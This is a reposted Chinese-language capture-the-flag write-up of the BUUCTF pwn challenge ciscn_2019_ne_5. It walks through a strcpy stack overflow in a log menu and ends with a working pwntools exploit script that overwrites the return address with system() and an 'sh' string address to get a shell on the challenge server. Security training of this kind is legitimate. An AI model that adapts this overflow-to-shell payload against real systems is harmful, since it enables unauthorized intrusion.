[BUUCTF-pwn]——ciscn_2019_ne_5
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——ciscn_2019_ne_5
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
[BUUCTF-pwn]——ciscn_2019_ne_5
- 題目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5
checksec下
在IDA中,竟然不給我反匯編,第一次碰到.
查了下解決方法,在反匯編失敗的地方,單獨(dú)反匯編就好.
由于最開始的反匯編失敗,反匯編的代碼可能與實(shí)際有些許出入,應(yīng)該就是反匯編失敗的地方,__isoc99_scanf() 函數(shù). 通過驗(yàn)證得到第一個(gè)是給s1賦值,第二個(gè)是給v3賦值;AddLog()函數(shù)里面的應(yīng)該是給src賦值
思路也就出來了: 在1選項(xiàng)中AddLog()給src賦值, 然后,在4選項(xiàng),通過strcpy給dest賦值,進(jìn)行棧溢出的利用.
查看一下,有沒有可以利用的字符串,畢竟已經(jīng)找到了system函數(shù)
發(fā)現(xiàn)了 ‘sh’ 字符
exploit
from pwn import * context.os='linux' context.arch='i386' context.log_level='debug' p = remote("node3.buuoj.cn",25035) sh_addr = 0x080482ea system_addr = 0x080486B9 p.sendlineafter("Please input admin password:",'administrator') p.sendlineafter("0.Exit\n:",'1') payload = 'a'*(0x48+0x4)+p32(system_addr)+p32(sh_addr)p.sendlineafter("Please input new log info:",payload) p.sendlineafter("0.Exit\n:",'4')p.interactive()總結(jié)
以上是生活随笔為你收集整理的[BUUCTF-pwn]——ciscn_2019_ne_5的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——铁人三项(第